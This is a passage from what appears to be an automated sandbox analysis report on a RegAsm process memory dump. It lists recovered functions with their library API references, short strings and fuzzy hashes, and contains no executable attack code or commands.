API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID: zA$zA
API String ID: 3053331623-2891261629
Opcode ID: 64b8a471f0bbf50294b7c22394a367852c954cdf6a9aa49a91d3b8e7e4af76d4
Instruction ID: 53972e3499c9381113a31361ce457d97195298eb20028607f6c6d65a004869b6
Opcode Fuzzy Hash: 64b8a471f0bbf50294b7c22394a367852c954cdf6a9aa49a91d3b8e7e4af76d4
Instruction Fuzzy Hash: 7F31B2B4D00209EFCB04DF95D581AEEBBB1BF48304F10856AE815A7390EB34AE45CFA5

Function 005094A0 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 338COMMON

Download Yara Rule

Strings

7, xrefs: 00509847
>, xrefs: 005096F0
!kcc, xrefs: 005097BC

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: !kcc$7$>
API String ID: 0-3074482854
Opcode ID: 29750111deb84b7588785617db08492fa461d3798ce80ec83168ceaa2c92d49a
Instruction ID: 1a053a08fb235a40f07a1a16a9561ee80e966d54d3274d9a8826d429f96d62fe
Opcode Fuzzy Hash: 29750111deb84b7588785617db08492fa461d3798ce80ec83168ceaa2c92d49a
Instruction Fuzzy Hash: 75F14274D04248DFDB14CFA8C890BEEBBB2BF49304F1484A9D845AB386D735AA45CF60

Function 0055C285 Relevance: 10.8, APIs: 7, Instructions: 329COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0055C30B

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: f70da735b144380618cf4515d7c89395848c01acb3a287e63f8147dc8b992a0b
Instruction ID: a4d94c605d1a9f00be99a8e263be0421509704955c1c499ae9695e573385f7e4
Opcode Fuzzy Hash: f70da735b144380618cf4515d7c89395848c01acb3a287e63f8147dc8b992a0b
Instruction Fuzzy Hash: 40B15772A003569FDF118E68CCA1BBE7FA5FF59312F158556EC04AF382E274A905C7A0

Function 00418CD0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 207COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCPMTD ref: 00418D95
_memcpy_s.LIBCPMTD ref: 00418DCE
_memcpy_s.LIBCPMTD ref: 00418E79
_memcpy_s.LIBCPMTD ref: 00418EB2

Strings

Info, xrefs: 00418DF1
Salt, xrefs: 00418D10

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: _memcpy_s
String ID: Info$Salt
API String ID: 2001391462-2052181562
Opcode ID: 218cf15dcfcf4135066c03b29503c0864adc5bbb05f67a6515e3a2314924ca5a
Instruction ID: c264f8babf55e3121e48eae263ef24839df939fa8e29ab3a41309e630623033c
Opcode Fuzzy Hash: 218cf15dcfcf4135066c03b29503c0864adc5bbb05f67a6515e3a2314924ca5a
Instruction Fuzzy Hash: 1991C8B5E002089BCF18DF95D891AEEBBB5BF48700F20815EE519B7391DB34A941CF64

Function 005415D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00541607
___except_validate_context_record.LIBVCRUNTIME ref: 0054160F
_ValidateLocalCookies.LIBCMT ref: 00541698
__IsNonwritableInCurrentImage.LIBCMT ref: 005416C3
_ValidateLocalCookies.LIBCMT ref: 00541718

Strings

csm, xrefs: 005416AD

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: a540b074671f36167dc129147950784cfae59cc2a7a1fa721ab5878aeb002676
Instruction ID: c68a64b44508398c878f129a5d3fe6c98b1eedbf56001cbea5a083c7032634fd
Opcode Fuzzy Hash: a540b074671f36167dc129147950784cfae59cc2a7a1fa721ab5878aeb002676
Instruction Fuzzy Hash: A241E134A002099BCF10DF68C884AEEBFB5FF85328F188555E815AB352D731EA41CF96

Function 0055B745 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,0041C3C8,?,8341C89B,?,0055B854,0041C3C8,0053EE88,00000000,0041C3C8), ref: 0055B806

Strings

api-ms-, xrefs: 0055B79C
ext-ms-, xrefs: 0055B7B0

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 07332b6ce17e2f703ef61ed6b4f156b0a394a141b95f34ed5d9ccba1d0ca9100
Instruction ID: e3e96c8ff579e253a43238db1645e7e45017178ed6114f0d3f05bd009eec5719
Opcode Fuzzy Hash: 07332b6ce17e2f703ef61ed6b4f156b0a394a141b95f34ed5d9ccba1d0ca9100
Instruction Fuzzy Hash: 50212B35A11111EFEB219B34DC99A5A3F68FF967A1F210612ED05A72C0D770ED09D6E0

Function 00540BE5 Relevance: 9.2, APIs: 6, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00540C2E
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00540C99
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00540CB6
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00540CF5
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00540D54
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00540D77

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 965879474f20308d66b19da333d38cfe82853274df6174ffd504edcd705e059b
Instruction ID: 7924bcfe56baad60bca6f69dd414dbd1d4c79609b7320330f16e382d54830c9a
Opcode Fuzzy Hash: 965879474f20308d66b19da333d38cfe82853274df6174ffd504edcd705e059b
Instruction Fuzzy Hash: 9351DF7290020AABEF205FA4CC45FEB7FA9FF44758F204529FA15A7194D774AC18CBA0

Function 00548C1C Relevance: 9.1, APIs: 6, Instructions: 94COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0054A0F8: Replicator::operator[].LIBCMT ref: 0054A135

DName::operator=.LIBVCRUNTIME ref: 00548CC8

Part of subcall function 0054885E: DName::operator+.LIBCMT ref: 005488C9
Part of subcall function 0054885E: DName::operator+.LIBCMT ref: 00548B93

DName::operator+.LIBCMT ref: 00548C82
DName::operator+.LIBCMT ref: 00548C8E
DName::DName.LIBVCRUNTIME ref: 00548CD2
DName::operator+.LIBCMT ref: 00548CEF
DName::operator+.LIBCMT ref: 00548CFB

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
String ID:
API String ID: 955152517-0
Opcode ID: 6057e8de4a3bc3946397680d610b676326f041e0c2e18d8cea43842d062cffb7
Instruction ID: ea259bc8041b85ddfc26555461702d1f19262a6af636b3ae9ec508b4714b1276
Opcode Fuzzy Hash: 6057e8de4a3bc3946397680d610b676326f041e0c2e18d8cea43842d062cffb7
Instruction Fuzzy Hash: 5D318FB1A012049FCB14DF54C859AEEBFF4BFA9308F14885DE586A7391DB749944CB60

Function 00567C9A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 00567CEB
TypeidsEqual.LIBVCRUNTIME ref: 00567D10
PMDtoOffset.LIBCMT ref: 00567D26
PMDtoOffset.LIBCMT ref: 00567DA7

Strings

.?AVAuthenticatedSymmetricCipher@CryptoPP@@, xrefs: 00567DA3

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: EqualOffsetTypeids
String ID: .?AVAuthenticatedSymmetricCipher@CryptoPP@@
API String ID: 1707706676-708400366
Opcode ID: 2ca317564d3a52bdce74212441e3e6b18e266408b0b4746ca7a4d4689c7ceabc
Instruction ID: 6183c815ec9eaf9a494310280fafbb1ff3a34c911f8066f673c7857368414e6e
Opcode Fuzzy Hash: 2ca317564d3a52bdce74212441e3e6b18e266408b0b4746ca7a4d4689c7ceabc
Instruction Fuzzy Hash: 294167359082099BCF11CF68C481AEEBFF5FF59718F14488AE851A7381D632AE04CBA0

Function 0054971C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getSignedDimension.LIBCMT ref: 0054976D

Strings

void, xrefs: 0054973D
`template-parameter, xrefs: 005497D7

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Decorator::getDimensionSigned
String ID: `template-parameter$void
API String ID: 2996861206-4057429177
Opcode ID: 429f89e7201006709f20a43ec1909a92f9b461d6af2dcfb0a2af1a8c6fb3cefb
Instruction ID: 78ea58bf3f5d40766a66675f153a780f9fd7fd566ba505c7f4f6f0a5f7840526
Opcode Fuzzy Hash: 429f89e7201006709f20a43ec1909a92f9b461d6af2dcfb0a2af1a8c6fb3cefb
Instruction Fuzzy Hash: 9A312F719042099BDF04DBE4D85ABFFBBF8BB59318F10442AE601F7191DB746A08DB61

Function 005504B8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,8341C89B,?,?,00000000,0056B350,000000FF,?,00550494,?,?,00550468,00000000), ref: 005504ED
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005504FF
FreeLibrary.KERNEL32(00000000,?,00000000,0056B350,000000FF,?,00550494,?,?,00550468,00000000), ref: 00550521

Strings

CorExitProcess, xrefs: 005504F7
mscoree.dll, xrefs: 005504E6

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 715ae26f1df17045483f44e7f30f7cbd8e75caaab172ca77aed8a01661f39ecc
Instruction ID: edd3f38bb49b7ed2c59420e0eea74cbf21de6eeb82f48ed1eb935a135c82407f
Opcode Fuzzy Hash: 715ae26f1df17045483f44e7f30f7cbd8e75caaab172ca77aed8a01661f39ecc
Instruction Fuzzy Hash: 60016235A44659EFDB118F54DC09BBEBFB8FB05B16F000626F861A32D0EBB59904CA90

Function 00418600 Relevance: 7.6, APIs: 5, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00418612
int.LIBCPMTD ref: 00418624

Part of subcall function 0040E500: std::_Lockit::_Lockit.LIBCPMT ref: 0040E516
Part of subcall function 0040E500: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E540

Concurrency::cancel_current_task.LIBCPMTD ref: 0041866B
std::_Lockit::~_Lockit.LIBCPMT ref: 004186E1

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID:
API String ID: 3053331623-0
Opcode ID: 9dfa335a9617bfa51966f1f9c5bcca831a14ce292f15ae3f1da6f232f06b58cf
Instruction ID: 4f9b08ad9ea1833e01c620b55d558fd689047bf99b404b2cebb7e2b18f99977d
Opcode Fuzzy Hash: 9dfa335a9617bfa51966f1f9c5bcca831a14ce292f15ae3f1da6f232f06b58cf
Instruction Fuzzy Hash: 0631B4B5D00209DFCB04DF95D585AEEBBB1BF48304F10866AE815B7390DB346A45CF95

Function 0053FFF3 Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0053FFFA
std::_Lockit::_Lockit.LIBCPMT ref: 00540005
std::_Lockit::~_Lockit.LIBCPMT ref: 00540073

Part of subcall function 00540156: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0054016E

std::locale::_Setgloballocale.LIBCPMT ref: 00540020
_Yarn.LIBCPMT ref: 00540036

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 55633578a96282770fe92a03875ab03946d864bce54cf0b12479ebad27d1b95f
Instruction ID: 01b92c8581a9b4f7daa214a8d17a277ee38d8442a4420f2831fb8f25587f8b46
Opcode Fuzzy Hash: 55633578a96282770fe92a03875ab03946d864bce54cf0b12479ebad27d1b95f
Instruction Fuzzy Hash: ED01DF75A005168BCB06EB20CC596BC7FA1FFE8340B14501AED1257392CF746E06DBC1

Function 005454FF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

Replicator::operator[].LIBCMT ref: 0054556B
DName::operator=.LIBVCRUNTIME ref: 00545600

Strings

6VT, xrefs: 0054557E
6VT, xrefs: 00545507

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Name::operator=Replicator::operator[]
String ID: 6VT$6VT
API String ID: 3211817929-3469345667
Opcode ID: 505c11219b8a677678f10478d5e0515d3b53fb340e56792bb3c65efe8514eb71
Instruction ID: 436718d72e149dd348de0bf8956e36b9ce54331c099c73560438a4ae18dc5a68
Opcode Fuzzy Hash: 505c11219b8a677678f10478d5e0515d3b53fb340e56792bb3c65efe8514eb71
Instruction Fuzzy Hash: B0313631600A049FDB14DBA4E8497FE7FAAFB56B1DF14442DE582D7282EF789844CB50

Function 0054684C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00544103: pDNameNode::pDNameNode.LIBCMT ref: 00544129

DName::DName.LIBVCRUNTIME ref: 0054690B
DName::operator+.LIBCMT ref: 00546919

Strings

void, xrefs: 0054689C
void , xrefs: 005468B4

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Name$Name::Name::operator+NodeNode::p
String ID: void$void
API String ID: 3257498322-3746155364
Opcode ID: e6938d89f6235a91674158057764b790ed661707474b7a1337765f99360457c9
Instruction ID: 2e0dcc8e48a0956e0fc30b177fb4e7bc1997c403489e9a914e9954fe780c0bce
Opcode Fuzzy Hash: e6938d89f6235a91674158057764b790ed661707474b7a1337765f99360457c9
Instruction Fuzzy Hash: E72131B5904109EFDF04DF90C859AFE7FB8FB09308F108559E906A7251EBB05658DF51

Function 00558A61 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(8341C89B,00000000,00000000,00000000), ref: 00558AC4

Part of subcall function 0055C005: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0055DF67,?,00000000,-00000008), ref: 0055C066

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00558D16
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00558D5C
GetLastError.KERNEL32 ref: 00558DFF

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 02c84562db3c98fad455ef878ab7dbca0ae57f6865a1298bf05add676ed35f88
Instruction ID: c0e2e953aae1e6e7c68fbab58dcd358975a46ae928b399a39bb9de7c245bd999
Opcode Fuzzy Hash: 02c84562db3c98fad455ef878ab7dbca0ae57f6865a1298bf05add676ed35f88
Instruction Fuzzy Hash: 7AD17AB5D002489FCF05CFA8D8949ADBFB9FF48315F28452AE856FB351DA30A949CB50

Function 00546923 Relevance: 6.2, APIs: 4, Instructions: 192COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0054692A
UnDecorator::getSymbolName.LIBCMT ref: 005469BC
DName::operator+.LIBCMT ref: 00546AC0
DName::DName.LIBVCRUNTIME ref: 00546B63

Part of subcall function 005444DA: shared_ptr.LIBCMT ref: 005444F6

Part of subcall function 005446D9: DName::DName.LIBVCRUNTIME ref: 00544727

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Name$Name::$Decorator::getH_prolog3Name::operator+Symbolshared_ptr
String ID:
API String ID: 1134295639-0
Opcode ID: 17b545686ffbd83f461e5fa8e49ff6911f03a41484d8adaf88abe412f4fcb787
Instruction ID: adde3340624beed78fb7815e48ae6e54cb2a8d11efd9e0536a69273dc1d5f33f
Opcode Fuzzy Hash: 17b545686ffbd83f461e5fa8e49ff6911f03a41484d8adaf88abe412f4fcb787
Instruction Fuzzy Hash: DD7147B1D00219DFDB00CFA4D885BEDBFB8FB1A318F14542AE941BB291DB749944DB61

Function 00546F9D Relevance: 6.2, APIs: 4, Instructions: 169COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 005470D2

Part of subcall function 00544216: __aulldvrm.LIBCMT ref: 00544247

DName::operator+.LIBCMT ref: 00547033
DName::operator=.LIBVCRUNTIME ref: 00547117
DName::DName.LIBVCRUNTIME ref: 00547149

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator=__aulldvrm
String ID:
API String ID: 2973644308-0
Opcode ID: 99b5cd79d29699f7cf1e02f05b5d71bffb07d26f1fc7d65a0859f400205991c3
Instruction ID: b98d7673acd3daae7ff34dee4b301045ff4dff8c8419de0e582cf73e8e56fba6
Opcode Fuzzy Hash: 99b5cd79d29699f7cf1e02f05b5d71bffb07d26f1fc7d65a0859f400205991c3
Instruction Fuzzy Hash: 81618AB0904219EFCB14CF94CC85AEEBFB4FB5A308F1494AAE941AB351D7709A44DF90

Function 0051C640 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 109COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000010), ref: 0051C663

Strings

operation failed with error , xrefs: 0051C6B4
OS_Rng: , xrefs: 0051C693
P@, xrefs: 0051C739

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast
String ID: operation failed with error $OS_Rng: $P@
API String ID: 1452528299-2227021971
Opcode ID: c8262143113b87fae6c2836e7bf24fd7d87294bcdd9b776b340323f15790e968
Instruction ID: 7d1ade67ec2d759c352fa15240a005782d59d69d9f8779f71aae645f15b0fe31
Opcode Fuzzy Hash: c8262143113b87fae6c2836e7bf24fd7d87294bcdd9b776b340323f15790e968
Instruction Fuzzy Hash: 875116B1D00248EFCB05DFA9D951BEEBBB4BF48304F2085ADE415A7381DB745A44CBA5

Function 0040BFA0 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0040BFDA
__aulldiv.LIBCMT ref: 0040C000
__aulldiv.LIBCMT ref: 0040C028
__aulldiv.LIBCMT ref: 0040C048

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: cb24858b38ca5f96361cca1c3c554668d37f17c0265753c7f8a9988f1c73d6fe
Instruction ID: a8bb27bb9ea891491c7cdd180f1d72b25329bb109c8645e91b68c3f2cac08202
Opcode Fuzzy Hash: cb24858b38ca5f96361cca1c3c554668d37f17c0265753c7f8a9988f1c73d6fe
Instruction Fuzzy Hash: E121FAB5610309ABEB11DF14CC82FAE7BA5FB88704F24C459F9189F285D674E911CB98

Function 00540837 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000400,?,?,?,004F4C37,00000000,00000000,?,?,?,004F4C37,?,?,?,00000000), ref: 00540854
GetLastError.KERNEL32(?,?,?,004F4C37,?,?,?,00000000,00000000), ref: 00540860
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,004F4C37,00000000,00000000,?,?,?,004F4C37,?,?,?,00000000), ref: 00540886
GetLastError.KERNEL32(?,?,?,004F4C37,?,?,?,00000000,00000000), ref: 00540892

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 9d15dc997c8cb139624ddcd69354d736c771ef8327062e0090a6e7e09d49c481
Instruction ID: 0e87ead7e97f2a384fcfa5accfbb4679788fe648df4865f963f00f746cf5b545
Opcode Fuzzy Hash: 9d15dc997c8cb139624ddcd69354d736c771ef8327062e0090a6e7e09d49c481
Instruction Fuzzy Hash: DB011236600159FB8F221F56DD08D9F3E26FBD97A4B108414FE0596160C631C821EBE0

Function 00565D2A Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0056233B,00000000,00000001,0000000C,00000000,?,00558E53,00000000,00000000,00000000), ref: 00565D41
GetLastError.KERNEL32(?,0056233B,00000000,00000001,0000000C,00000000,?,00558E53,00000000,00000000,00000000,00000000,00000000,?,0055942D,?), ref: 00565D4D

Part of subcall function 00565D13: CloseHandle.KERNEL32(FFFFFFFE,00565D5D,?,0056233B,00000000,00000001,0000000C,00000000,?,00558E53,00000000,00000000,00000000,00000000,00000000), ref: 00565D23

___initconout.LIBCMT ref: 00565D5D

Part of subcall function 00565CD5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00565D04,00562328,00000000,?,00558E53,00000000,00000000,00000000,00000000), ref: 00565CE8

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0056233B,00000000,00000001,0000000C,00000000,?,00558E53,00000000,00000000,00000000,00000000), ref: 00565D72

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 2c79a9b71dde108c042268ae03deb70890c93da81b5c5ed260085af2a5d2905b
Instruction ID: 3094af20ac564f96aac9fc6e02964965070340a0e80f802341230c335d1401f4
Opcode Fuzzy Hash: 2c79a9b71dde108c042268ae03deb70890c93da81b5c5ed260085af2a5d2905b
Instruction Fuzzy Hash: FBF01536180519FBCF222FE5EC0CA9E3F66FB593B1F004110FA5996170E6328920EB90

Function 004409B0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 369COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00440EC2

Strings

`XA, xrefs: 00440EAF
`@, xrefs: 00440EB8

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID: `XA$`@
API String ID: 323602529-3161672447
Opcode ID: 4dde8de92648f45aa932b1f886abd6da58f4c0d728a1e87d73513b7c94c79926
Instruction ID: cf9dc5a11ffdfd7da4e7bfe6e66161c0542199dd574abb9e9307dff3bba1edc7
Opcode Fuzzy Hash: 4dde8de92648f45aa932b1f886abd6da58f4c0d728a1e87d73513b7c94c79926
Instruction Fuzzy Hash: BCF11AB1C102189BCB19EF91DC91AEEB778BF58304F4041AEE50A67251EF346B89CF64

Function 005554AA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00555621

Strings

-, xrefs: 00555572
+, xrefs: 0055557F

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: +$-
API String ID: 3732870572-2137968064
Opcode ID: c87c9cf9bf1fe2ee23a29c9dd72d42d820ebf7870f5806581cae8dae03fbb9d2
Instruction ID: b7ebbf75f4a4394fdac18510c5a2a831f8dc8d7d0a044abd742ea1c49a61dbf6
Opcode Fuzzy Hash: c87c9cf9bf1fe2ee23a29c9dd72d42d820ebf7870f5806581cae8dae03fbb9d2
Instruction Fuzzy Hash: CCA1D170901659AFCF24CE68C8706AE7FA2FF55326F54855BEC659B281F230D9098B50

Function 00418FF0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 261COMMON

Download Yara Rule

APIs

Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00419053
_memcpy_s.LIBCPMTD ref: 004191C9

Strings

0#R, xrefs: 004190D3

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ProcessorVirtual$Concurrency::RootRoot::_memcpy_s
String ID: 0#R
API String ID: 285175975-3773201211
Opcode ID: 95fc27e3c8f9389f6ed27db32c8cd4d55acb266686f4a6c51a34ddc1af9c5cf6
Instruction ID: d050780ede4ed4fe07c9849112b8c1208e61c752c872a3d8e8aeee51617b1c59
Opcode Fuzzy Hash: 95fc27e3c8f9389f6ed27db32c8cd4d55acb266686f4a6c51a34ddc1af9c5cf6
Instruction Fuzzy Hash: A3C1B3B4D006189FCB04CFA8D994ADEF7B5BF88300F20829AD919AB355D734AE85CF54

Function 00417CB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

std::ios_base::clear.LIBCPMTD ref: 00417D4B
std::ios_base::clear.LIBCPMTD ref: 00417F39

Part of subcall function 00417740: std::ios_base::clear.LIBCPMTD ref: 00417871

Strings

c[A, xrefs: 00417D7B

Memory Dump Source

